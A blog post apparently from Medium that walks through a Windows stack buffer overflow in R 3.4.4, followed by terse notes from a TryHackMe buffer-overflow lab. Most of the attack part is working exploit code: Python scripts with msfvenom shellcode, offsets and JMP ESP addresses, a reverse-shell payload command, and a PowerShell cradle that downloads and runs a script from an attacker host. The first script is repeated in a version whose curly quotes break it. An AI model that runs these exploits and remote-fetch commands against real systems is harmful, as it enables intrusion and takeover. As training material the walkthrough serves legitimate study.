R 3.4.4 — Buffer Overflow (Vanilla EIP Overwrite)

Hi readers, this is just another windows buffer overflow walkthrough. We will be going through step by step process starting from fuzzing to exploitation.

I will be reproducing this https://www.exploit-db.com/exploits/46265 but originally in his submission author has verified this in windows XP SP3 x86, but I will be showing you how do this attack in windows 10 x64 with little bit tweaking. So let’s get started. Open up your mind, ready to learn?

Requirements:

  1. Windows 10 /x64 (I am using virtual machine in vmware workstation)

2. R 3.4.4

https://cran.r-project.org/bin/windows/base/old/3.4.4/R-3.4.4-win.exe

3. Immunity Debugger

https://debugger.immunityinc.com/ID_register.py

4. Python 3 /Python 2 (Whatever you prefer, I will be using python 3)

5. Any OS with metasploit installed (I am using Kali linux for amd x64 )

Step 1. Fuzzing

Here we will be finding a vulnerable injection point which is unable to handle large chunks of data and leads to crashing of application. You can look for any input field which is unable to handle large chunk of characters or any command line argument (in case of command line app without GUI). In our case it is EditGUI PreferencesLanguage for menus and messages

a) Run the following code in python interpreter and copy the junk characters for testing.

‘A’*1000

b) Copy these bunch of 1000 A’s and try to give this input to the “Language for menus and messages” and click ok.

c) Click ok and application will crash.

We got vulnerable injection point!

Step 2. Finding offset

Now our goal is to control EIP/Program Counter(It stores address of next instruction to be executed) . For this we will be using Immunity debugger to view contents of the registers at the time of crash.

We need to attach Immunity to our vulnerable application.

a) Click on File Attach and choose Rgui configuration editor. Click Attach.

b) You can see in bottom right it will be showing Paused. To run this we will click resume button.

c) Now we will move to our program and again give input of 1000 ‘A’s.

In top right window we will able to see that ESP,EIP are overwritten with our input.

Now we will be finding specific no of A’s, we should give such that we can control EIP.

We can do this manually (time consuming) or by using ruby script which comes with metasploit framework. I will show using metasploit script.

i) Make sure you are having these two ruby scripts

pattern_create.rb and pattern_offset.rb which are at “/usr/share/metasploit-framework/tools/exploit” or you can download them from https://github.com/n00ky4u/buffer_overflow_scripts

ii) First we will copy the output of “pattern_create.rb -l 1000”. Here 1000 is the length of characters, we used.

iii) Then we will give this as input to our injection point. (Make sure Immunity is attached prior submitting)

iv) Then note/copy the EIP value, we will be using it further.

6A41376A

v) Now we will use pattern_offset.rb this will tell us the correct offset.

“pattern_offset.rb -l 1000 -q 6A41376A”

vi) Now we will check/test our finding. run ‘A’*292 + ‘B’ *4 in python terminal.

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

vii) Try giving this as input to injection point. (Make sure immunity is attached). We will see that EIP has value 42424242 which is nothing but 4 B’s in hexadecimal. Now we control EIP.

Step 3. Finding bad characters.

According to me this is the most tedious step/I do not know how to do this step properly. So I would suggest you to please try to learn this from some other resource. Also if you are following this tutorial please let me know What is your approach for finding bad characters?

a)Only bad character which is here is \x00.

b) Refer to

https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/

badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

Some default bad characters which I know are:

\n (New Line) \x0a

\r (Carriage return) \x0d

\0 (String terminating character in C) \x00

\x00\x0a\x0d

Step 4. Finding vulnerable module in the binary.

We will be using a python 2 plugin for Immunity Debugger for finding vulnerable module. Basic motive is to find a .dll file which do not have any kind of protection against buffer overflow attack.

a) Download mona.py from corelan gihub repository. https://github.com/corelan/mona/blob/master/mona.py

b) Mona have various features and functionalities lookout the docs for more info

c) Copy “mona.py” to “C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands”. In 32 bit OS path will be “C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands”

d) Open Immunity and make sure binary is attached and loaded. Use command “!mona modules” in the bottom of the Immunity Debugger and press enter.

We can also set working directory:

!mona config -set workingfolder c:\mona\%p

e) Mona will show you all the available dll’s. Now we will be choosing that is not having any kind of protection. In this case we will be using “R.dll”.

Step 5. Generating shellcode.

a) Run command “!mona find -s “\xff\xe4” -m R.dll” . \xff\e4 is nothing but OP code for “JMP ESP”. Basically we are finding the address which is pushed onto the stack when this .dll is called. After this memory address we will be storing our shellcode. Please note these addresses may be different in your case.

!mona find -s "\xff\xe4" -m R.dll

6E595DDB

b) Now lets build our shell code. Here we will use findings of bad characters.

i) First we will generate payload for opening calculator using msfvenom. Specify bad characters with “-b” option.

msfvenom -a x86 — platform Windows -p windows/exec cmd=calc.exe -e x86/alpha_upper -b ‘\x00’ -f c

ii) Then Copy this shell code and concat it with the shellcode.

iii) We might need to add some “nop sled” that is “\x90” to make our exploit work properly. In this case i have used 9 of them.

iv) Finally combine everything and create a python3 script. Note as we are using python3 we need to convert it into bytes using “b” in front of every string.

v) Now just run the script and our payload will be saved in file “python3_shellcode.txt” in the same directory.

#!/usr/bin/python3
#msfvenom -a x86 - platform Windows -p windows/exec cmd=calc.exe -e x86/alpha_upper -b '\x00' -f c
shellcode = (b"\x89\xe0\xda\xda\xd9\x70\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x43\x43"
b"\x43\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58\x34\x41"
b"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
b"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
b"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x4c\x42\x53\x30\x45"
b"\x50\x33\x30\x53\x50\x4b\x39\x4d\x35\x56\x51\x4f\x30\x55\x34"
b"\x4c\x4b\x36\x30\x46\x50\x4c\x4b\x30\x52\x54\x4c\x4c\x4b\x46"
b"\x32\x55\x44\x4c\x4b\x43\x42\x57\x58\x54\x4f\x4e\x57\x51\x5a"
b"\x57\x56\x36\x51\x4b\x4f\x4e\x4c\x47\x4c\x33\x51\x43\x4c\x43"
b"\x32\x36\x4c\x31\x30\x39\x51\x38\x4f\x54\x4d\x43\x31\x49\x57"
b"\x5a\x42\x4c\x32\x46\x32\x50\x57\x4c\x4b\x50\x52\x52\x30\x4c"
b"\x4b\x31\x5a\x37\x4c\x4c\x4b\x50\x4c\x52\x31\x34\x38\x4d\x33"
b"\x51\x58\x33\x31\x38\x51\x46\x31\x4c\x4b\x31\x49\x37\x50\x45"
b"\x51\x58\x53\x4c\x4b\x50\x49\x34\x58\x4b\x53\x56\x5a\x50\x49"
b"\x4c\x4b\x30\x34\x4c\x4b\x35\x51\x4e\x36\x36\x51\x4b\x4f\x4e"
b"\x4c\x39\x51\x38\x4f\x34\x4d\x55\x51\x49\x57\x36\x58\x4b\x50"
b"\x54\x35\x4a\x56\x53\x33\x53\x4d\x4a\x58\x37\x4b\x43\x4d\x47"
b"\x54\x43\x45\x4a\x44\x30\x58\x4c\x4b\x46\x38\x46\x44\x55\x51"
b"\x49\x43\x53\x56\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x51\x48\x35"
b"\x4c\x53\x31\x38\x53\x4c\x4b\x43\x34\x4c\x4b\x55\x51\x48\x50"
b"\x4d\x59\x37\x34\x31\x34\x57\x54\x51\x4b\x31\x4b\x53\x51\x30"
b"\x59\x30\x5a\x30\x51\x4b\x4f\x4d\x30\x51\x4f\x31\x4f\x51\x4a"
b"\x4c\x4b\x55\x42\x4a\x4b\x4c\x4d\x51\x4d\x43\x5a\x53\x31\x4c"
b"\x4d\x4d\x55\x48\x32\x33\x30\x53\x30\x33\x30\x50\x50\x43\x58"
b"\x56\x51\x4c\x4b\x32\x4f\x4c\x47\x4b\x4f\x38\x55\x4f\x4b\x4a"
b"\x50\x48\x35\x39\x32\x51\x46\x35\x38\x49\x36\x4c\x55\x4f\x4d"
b"\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x33\x36\x33\x4c\x35\x5a\x4d"
b"\x50\x4b\x4b\x4d\x30\x32\x55\x33\x35\x4f\x4b\x47\x37\x34\x53"
b"\x54\x32\x42\x4f\x43\x5a\x35\x50\x30\x53\x4b\x4f\x48\x55\x45"
b"\x33\x53\x51\x42\x4c\x55\x33\x46\x4e\x52\x45\x42\x58\x53\x55"
b"\x53\x30\x41\x41")
#6E595DDB
buffer = b"A" * 292 + b"\xDB\x5D\x59\x6E" + b"\x90" * 9+ shellcode
print(type(buffer))
payload = buffer
try:
f=open("python3_shellcode.txt","wb")
print("[+] Creating %s bytes payload.." %len(payload))
f.write(buffer)
f.close()
print("[+] File created!")
except:
print("File cannot be created")

#!/usr/bin/python3

#msfvenom -a x86 — platform Windows -p windows/exec cmd=calc.exe -e x86/alpha_upper -b ‘\x00’ -f c

shellcode = (b”\x89\xe0\xda\xda\xd9\x70\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x43\x43"
b”\x43\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58\x34\x41"
b”\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
b”\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
b”\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x4c\x42\x53\x30\x45"
b”\x50\x33\x30\x53\x50\x4b\x39\x4d\x35\x56\x51\x4f\x30\x55\x34"
b”\x4c\x4b\x36\x30\x46\x50\x4c\x4b\x30\x52\x54\x4c\x4c\x4b\x46"
b”\x32\x55\x44\x4c\x4b\x43\x42\x57\x58\x54\x4f\x4e\x57\x51\x5a”
b”\x57\x56\x36\x51\x4b\x4f\x4e\x4c\x47\x4c\x33\x51\x43\x4c\x43"
b”\x32\x36\x4c\x31\x30\x39\x51\x38\x4f\x54\x4d\x43\x31\x49\x57"
b”\x5a\x42\x4c\x32\x46\x32\x50\x57\x4c\x4b\x50\x52\x52\x30\x4c”
b”\x4b\x31\x5a\x37\x4c\x4c\x4b\x50\x4c\x52\x31\x34\x38\x4d\x33"
b”\x51\x58\x33\x31\x38\x51\x46\x31\x4c\x4b\x31\x49\x37\x50\x45"
b”\x51\x58\x53\x4c\x4b\x50\x49\x34\x58\x4b\x53\x56\x5a\x50\x49"
b”\x4c\x4b\x30\x34\x4c\x4b\x35\x51\x4e\x36\x36\x51\x4b\x4f\x4e”
b”\x4c\x39\x51\x38\x4f\x34\x4d\x55\x51\x49\x57\x36\x58\x4b\x50"
b”\x54\x35\x4a\x56\x53\x33\x53\x4d\x4a\x58\x37\x4b\x43\x4d\x47"
b”\x54\x43\x45\x4a\x44\x30\x58\x4c\x4b\x46\x38\x46\x44\x55\x51"
b”\x49\x43\x53\x56\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x51\x48\x35"
b”\x4c\x53\x31\x38\x53\x4c\x4b\x43\x34\x4c\x4b\x55\x51\x48\x50"
b”\x4d\x59\x37\x34\x31\x34\x57\x54\x51\x4b\x31\x4b\x53\x51\x30"
b”\x59\x30\x5a\x30\x51\x4b\x4f\x4d\x30\x51\x4f\x31\x4f\x51\x4a”
b”\x4c\x4b\x55\x42\x4a\x4b\x4c\x4d\x51\x4d\x43\x5a\x53\x31\x4c”
b”\x4d\x4d\x55\x48\x32\x33\x30\x53\x30\x33\x30\x50\x50\x43\x58"
b”\x56\x51\x4c\x4b\x32\x4f\x4c\x47\x4b\x4f\x38\x55\x4f\x4b\x4a”
b”\x50\x48\x35\x39\x32\x51\x46\x35\x38\x49\x36\x4c\x55\x4f\x4d”
b”\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x33\x36\x33\x4c\x35\x5a\x4d”
b”\x50\x4b\x4b\x4d\x30\x32\x55\x33\x35\x4f\x4b\x47\x37\x34\x53"
b”\x54\x32\x42\x4f\x43\x5a\x35\x50\x30\x53\x4b\x4f\x48\x55\x45"
b”\x33\x53\x51\x42\x4c\x55\x33\x46\x4e\x52\x45\x42\x58\x53\x55"
b”\x53\x30\x41\x41")

#6E595DDB

buffer = b”A” * 292 + b”\xDB\x5D\x59\x6E” + b”\x90" * 9+ shellcode
print(type(buffer))

payload = buffer
try:
f=open(“python3_shellcode.txt”,”wb”)
print(“[+] Creating %s bytes payload..” %len(payload))
f.write(buffer)
f.close()
print(“[+] File created!”)
except:
print(“File cannot be created”)

Step 6. Exploitation

a) Just copy the contents of “python3_shellcode.txt” and give this as input to our injection point.

b) And our shellcode will execute and calculator will open.

I would appreciate your suggestions, feedbacks and queries.

Author: Prabhsimran (https://www.linkedin.com/in/pswalia2u/)

Buffer Overflow Prep(TryHackMe)

!mona config -set workingfolder c:\mona\%p
!mona bytearray -b "\x00"

1. OSCP.exe

a. OVERFLOW1

/usr/bin/msf-pattern_create -l 2000
6F43396E
/usr/bin/msf-pattern_offset -q 6F43396E -l 2000AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

https://github.com/pswalia2u/bof_scripts/blob/main/bad_chars.py

EIP 42424242offset: 1978!mona bytearray -b "\x00"buffer = prefix + overflow + b"BBBB" + bad_arrayecho "$(<badchars_payload.txt)"|nc 10.10.9.46 1337

https://github.com/pswalia2u/bof_scripts/blob/main/find_bad_chars.py

ESP 0193FA30
!mona compare -f C:\mona\oscp\bytearray.bin -a 0193FA30\x00\x07\x08\x2e\x2f\xa0\xa1 (Next char after badchar is affected)\x00\x07\x2e\xa0

Finding JMP address:

!mona modules
!mona find -s "\xff\xe4" -m essfunc.dllOR!mona jmp -r esp -cpb <badchars>625011AF\xaf\x11\x50\x62msfvenom -a x86 -p windows/exec CMD="powershell \"iex(New-Object Net.WebClient).DownloadString('http://10.14.12.69/Invoke-PowerShellTcp2.ps1')\"" --smallest -b "\x00\x07\x2e\xa0" -f python

Full script:

#!/usr/bin/python3#msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.14.12.69 LPORT=53 EXITFUNC=thread -b "\x00\x07\x2e\xa0" -f python --smallest#msfvenom -a x86 -p windows/exec CMD="powershell \"iex(New-Object Net.WebClient).DownloadString('http://10.14.12.69/Invoke-PowerShellTcp2.ps1')\"" --smallest -b "\x00\x07\x2e\xa0" -f python 
buf = b""
buf += b"\x6a\x49\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13"
buf += b"\x98\xe0\xc3\xd7\x83\xeb\xfc\xe2\xf4\x64\x08\x41\xd7"
buf += b"\x98\xe0\xa3\x5e\x7d\xd1\x03\xb3\x13\xb0\xf3\x5c\xca"
buf += b"\xec\x48\x85\x8c\x6b\xb1\xff\x97\x57\x89\xf1\xa9\x1f"
buf += b"\x6f\xeb\xf9\x9c\xc1\xfb\xb8\x21\x0c\xda\x99\x27\x21"
buf += b"\x25\xca\xb7\x48\x85\x88\x6b\x89\xeb\x13\xac\xd2\xaf"
buf += b"\x7b\xa8\xc2\x06\xc9\x6b\x9a\xf7\x99\x33\x48\x9e\x80"
buf += b"\x03\xf9\x9e\x13\xd4\x48\xd6\x4e\xd1\x3c\x7b\x59\x2f"
buf += b"\xce\xd6\x5f\xd8\x23\xa2\x6e\xe3\xbe\x2f\xa3\x9d\xe7"
buf += b"\xa2\x7c\xb8\x48\x8f\xbc\xe1\x10\xb1\x13\xec\x88\x5c"
buf += b"\xc0\xfc\xc2\x04\x13\xe4\x48\xd6\x48\x69\x87\xf3\xbc"
buf += b"\xbb\x98\xb6\xc1\xba\x92\x28\x78\xbf\x9c\x8d\x13\xf2"
buf += b"\x28\x5a\xc5\x8a\xc2\x5a\x1d\x52\xc3\xd7\x98\xb0\xab"
buf += b"\xe6\x13\x8f\x44\x28\x4d\x5b\x33\x62\x3a\xb6\xab\x71"
buf += b"\x0d\x5d\x5e\x28\x4d\xdc\xc5\xab\x92\x60\x38\x37\xed"
buf += b"\xe5\x78\x90\x8b\x92\xac\xbd\x98\xb3\x3c\x02\xe8\x8f"
buf += b"\xb4\xb2\xea\x93\xab\xb2\xf4\x8c\xe3\xf5\xf1\x85\xbb"
buf += b"\xff\xd6\x85\xb4\xfa\xd7\x82\xa9\xb2\xfb\x94\xe3\x99"
buf += b"\xfd\x94\xed\x80\xfd\x82\x80\xbb\xf1\x85\xad\xa3\xb1"
buf += b"\xce\x87\xb8\xef\x8e\xaf\xb8\xf9\x84\x90\xa3\xea\x89"
buf += b"\xad\xb0\xb0\xc7\xab\xa3\xec\x90\xf9\xf8\xb7\xd1\xf3"
buf += b"\xf9\xa9\xd4\xed\xe6\xaa\xce\xf5\xee\xb7\xa9\xad\xa1"
buf += b"\xf7\x8b\xa6\xfa\xc8\x8f\xb4\xb2\xea\xb3\xab\xb2\xf4"
buf += b"\x8c\x97\xb4\xe8\xd2\xed\xa7\xeb\xd1\xe4\xfe\xba\xe0"
buf += b"\xc3\xd7"
bad_array=b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"#625011AF
prefix = b"OVERFLOW1 "
offset = 1978
overflow = b"A" * offset
#padding = b""
#b"\xaf\x11\x50\x62"
retn=b"\xaf\x11\x50\x62"
#retn = b"BBBB"
shellcode = buf
#postfix =
#buffer = prefix + overflow + retn + bad_array Testing badcharsbuffer=prefix + overflow + retn + b"\x90" * 30 + shellcodeprint(type(buffer))
payload = buffer
try:
f=open("final_payload.txt","wb")
print("[+] Creating %s bytes payload.." %len(payload))
f.write(buffer)
f.close()
print("[+] File created!")
except:
print("File cannot be created")

https://github.com/pswalia2u/bof_scripts/blob/main/gen_final_payload.py

echo "$(<final_payload.txt)"|nc 10.10.83.6 1337

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store